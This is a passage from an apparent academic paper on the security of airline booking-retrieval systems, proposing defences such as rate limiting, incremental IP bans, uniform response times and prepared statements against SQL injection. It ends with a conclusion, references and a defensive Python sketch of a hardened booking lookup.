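            st.banned_until = float("inf") if step is None else now + step
            st.bans += 1
            st.invalid = 0


def burst(guard, client_id, start, n):
    """Feed n consecutive invalid requests at time `start`; return the actions."""
    actions = []
    for _ in range(n):
        result = guard.check(client_id, start)
        actions.append(result)
        if result[0] != "banned":
            guard.record(client_id, start, valid=False)
    return actions


if __name__ == "__main__":
    g = RetrievalGuard()
    # Constructed client identifier from a documentation address range.
    for i, (action, delay) in enumerate(burst(g, "198.51.100.7", 0.0, 31), 1):
        print(i, action, delay)
```

Because the state is keyed on a single client identifier, requests spread across many addresses are counted separately, which is the limitation Section 6.1.3 notes for IP bans.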

6.1.2 Valid and invalid information loading time
One of the reasons that airlines might opt to check the invalidity of the codes before accessing their database would be to reduce load on the database. However, this can leak some information about the invalidity to the user. One simple solution that we came up with is to simply store 5 of the latest database access times - the amount of time it took to retrieve the data - on a file in the web server. This reduces load, as well as giving the illusion that the database was also accessed given an invalid code, thereby normalizing the load times and preventing attackers from gaining any insights.

6.1.3 IP Bans
On top of using captchas, these airline sites could also implement IP or MAC address banning depending on the request load a suspicious user puts on the server. These bans could be incremental as well, such as a temporary ban of 5 minutes, 30 minutes to a day and then permanent bans if the user does not relent on the server. This would be rendered useless when multiple IP addresses are used, in which case other measures would have to be implemented in conjunction to counter the attacks, if any.

6.1.4 Limit Access
Limiting the access of a user is another measure to be considered. This would be in the form of limiting the scope of the reference checks, and to prevent cross-airline checks if the travel details do not contain the current airline. Moreover, additional mechanisms may be implemented for other actions when managing a booking, such as for the refund or altering of flight details.

6.2 Non-Visual Aspects
6.2.1 Preventing SQL Injection
One of the easiest ways is to use prepared statements, which are provided by the database and language libraries. This works because the values are transmitted separately using a different protocol and therefore need not be sanitised.

6.2.2 Increasing Brute-force Difficulty
Currently, most airlines make use of a 6-alphanumeric capital-only reference number. Airlines mostly retain this system due to ease of use for their customers. With an alphabet size of 36, this results in 36^6 = 2,176,782,336 different combinations. With usability in mind, we can make some minor changes, such as including lower-case alphabets - this increases the combinations to (26+36)^6 = 56,800,235,584. To increase it even further, we can increase the length to 8 - 62^8 = 218,340,105,584,896; this is a huge increase in the combinations.

6.2.3 Preventing Multiple Tries
The airlines we tested don’t have any measures to mitigate multiple requests from a single internet user. Again, we understand that this is for the customers’ ease-of-use. However, we can foresee that an attacker can DDoS the database just by sending multiple retrievals. This can be easily prevented by setting a delay on the IP/MAC address proportional to the times accessed, e.g. Delay = (2 seconds) (number of accesses). Another method is just preventing any more tries after a certain threshold, e.g. 30 tries.

7. CONCLUSION
With the results from the testing on various airline sites, it is evident that the current defences and measures in place are mainly to build upon and protect the weak key strength provided by the PNR.
These different measures are unable to provide sufficient safeguards against attacks on the booking retrieval system, due to varying flaws. Moreover, the different variations of implementations to the interfaces of these booking retrieval systems may leave multiple vulnerabilities to be exploited, as the fixes on one interface may not be applied onto another, thus leaving the unpatched interface still exploitable.
The main underlying issue relates back to the PNR system and its weak key strength. While additional defences can be developed and implemented to patch existing vulnerabilities or reinforce security, it would reach a breaking point at which the number of patches would saturate and it would not be cost beneficial to continue building upon the system.
This drives the proposal for modifying or replacing the system to match modern standards in terms of security requirements. Although costs of replacing the system would be exorbitant, it would be beneficial to replace the system at an earlier stage, compared to a later stage whereby costs may be influenced by additional factors, such as the data.

8. REFERENCES
[1] Anon. 2016. IATA Forecasts Passenger Demand to Double Over 20 Years. (October 2016). Retrieved November 1, 2017 from http://www.iata.org/pressroom/pr/Pages/2016-10-18-02.aspx

[2] Anon. 2017. Growth of global air traffic passenger demand 2017 | Statistic. (2017). Retrieved November 1, 2017 from https://www.statista.com/statistics/193533/growth-of-global-air-traffic-passenger-demand/

[3] Gloria Gerstein. 2016. Exploring cybersecurity risks within the airline industry. (June 2016).

[4] Chabeli Herrera. 2017. Traveling for the holidays? Your trip through Miami airport security could be faster than before. (October 2017). Retrieved October 25, 2017 from http://www.miamiherald.com/news/business/article180688011.html

[5] David Noland and Barbara Peterson. 2017. 12 Plane Crashes That Changed Aviation. (November 2017). Retrieved November 7, 2017 from http://www.popularmechanics.com/flight/g73/12-airplane-crashes-that-changed-aviation/

[6] Anon. 2017. World airport system crash sparks chaos. (September 2017). Retrieved November 1, 2017 from http://www.news.com.au/travel/travel-updates/incidents/international-airports-hit-by-computer-system-crash/news-story/3c82e6e312223ee279c9256725fc5a9a

[7] Jorge Valero. 2016. Hackers bombard aviation sector with over 1,000 attacks per month. (July 2016). Retrieved November 2, 2017 from https://www.euractiv.com/section/justice-home-affairs/news/hackers-bombard-aviation-sector-with-more-than-1000-attacks-per-month/

[8] Sophie Curtis. 2015. How much is your personal data worth? (November 2015). Retrieved November 2, 2017 from http://www.telegraph.co.uk/technology/news/12012191/How-much-is-your-personal-data-worth.html

[9] David Yanofsky. 2015. There has been another airline glitch. (October 2015). Retrieved November 2, 2017 from https://qz.com/535967/tech-glitches-keep-plaguing-us-airlines-this-dashboard-keeps-track-of-them-all/

[10] Mark Warner, Donna Quadri Felitti, and Priya V. Chandnani. 2010. A History of Travel Distribution: 1915 - 2009, HEDNA.

[11] Richard L. Johnson. 2002. Global Distribution Systems in Present Times. (October 2002). Retrieved November 2, 2017 from http://www.hotel-online.com/News/PR2002_4th/Oct02_GDS.html

[12] Anon. 2017. GDS market shares and more. (May 2017). Retrieved November 2, 2017 from https://www.businesstravel-iq.com/article/2017/05/11/gds-market-shares-and-more

[13] Anon. 2016. Amadeus completes acquisition of Navitaire. Amadeus (January 2016).

[14] ICAO. 2010. Guidelines on passenger name record (PNR) data, Montréal, Quebec: International Civil Aviation Organization.

[15] Anon. Manage booking. Retrieved November 3, 2017 from https://www.qantas.com/sg/en/manage-booking.html

[16] Anon. About manage booking. Retrieved November 3, 2017 from https://www.cathaypacific.com/cx/en_SG/manage-booking/manage-booking/about-manage-booking.html
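
As an added example (not code from the paper), the sketch below puts three of the paper's proposals into one booking lookup: the prepared statement of Section 6.2.1, a single error message for every failure so that a valid locator with the wrong name cannot be told apart from an unknown locator (the leak shown in Figure 5), and the padding of malformed-code responses with the average of the five latest database access times from Section 6.1.2. The table layout, class and function names and the sample booking are constructed, and the access times are kept in memory rather than in a file on the web server.

```python
import re
import sqlite3
import time
from collections import deque

LOCATOR_RE = re.compile(r"[A-Z0-9]{6}")  # 6-character uppercase alphanumeric (Section 3.5)
GENERIC_ERROR = "Booking not found. Please check your details."  # same text for every failure


def make_db():
    """In-memory database holding one constructed booking for the demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE bookings (locator TEXT PRIMARY KEY, last_name TEXT, itinerary TEXT)"
    )
    db.execute("INSERT INTO bookings VALUES ('ABC123', 'TAN', 'SIN-HKG')")
    return db


class BookingLookup:
    """Hypothetical retrieval handler; `sleep` and `clock` are injectable for tests."""

    def __init__(self, db, sleep=time.sleep, clock=time.perf_counter):
        self.db = db
        self.sleep = sleep
        self.clock = clock
        self.recent = deque(maxlen=5)  # five latest database access times (Section 6.1.2)

    def retrieve(self, locator, last_name):
        """Return (itinerary, None) on success or (None, GENERIC_ERROR) on any failure."""
        locator = locator.strip().upper()
        last_name = last_name.strip().upper()

        if not LOCATOR_RE.fullmatch(locator):
            # Malformed code: skip the database, but wait as long as a recent
            # query took so the response time does not reveal the shortcut.
            if self.recent:
                self.sleep(sum(self.recent) / len(self.recent))
            return None, GENERIC_ERROR

        start = self.clock()
        # Prepared statement: values travel separately from the SQL text, and
        # locator and name are matched in one query so neither is confirmed alone.
        row = self.db.execute(
            "SELECT itinerary FROM bookings WHERE locator = ? AND last_name = ?",
            (locator, last_name),
        ).fetchone()
        self.recent.append(self.clock() - start)

        if row is None:
            return None, GENERIC_ERROR
        return row[0], None


if __name__ == "__main__":
    lookup = BookingLookup(make_db())
    for loc, name in [("ABC123", "Tan"), ("ABC123", "Lim"), ("ZZZ999", "Tan"), ("bad!", "Tan")]:
        print(loc, name, lookup.retrieve(loc, name))
```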
